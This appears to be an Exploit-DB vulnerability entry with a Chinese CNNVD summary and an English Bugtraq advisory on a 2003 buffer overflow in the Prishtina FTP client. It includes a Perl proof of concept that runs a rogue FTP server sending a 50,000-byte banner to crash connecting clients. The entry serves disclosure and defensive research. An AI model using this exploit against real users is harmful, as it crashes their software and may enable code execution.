https://www.exploit-db.com/exploits/22637
https://www.securityfocus.com/bid/87126
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-063

PrishtinaFTP客户端1.x版本存在缓冲区溢出漏洞。远程FTP服务器借助超长FTPbanner导致服务拒绝（崩溃）并可能执行任意代码。

source: http://www.securityfocus.com/bid/7671/info

Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client. 

#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$bufn";
 close($client);
}

Prishtina Soft Prishtina FTP V.1

来源:BUGTRAQ
名称:20030522PrishtinaFTPv.1.*:remoteDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105370592729044&w;=2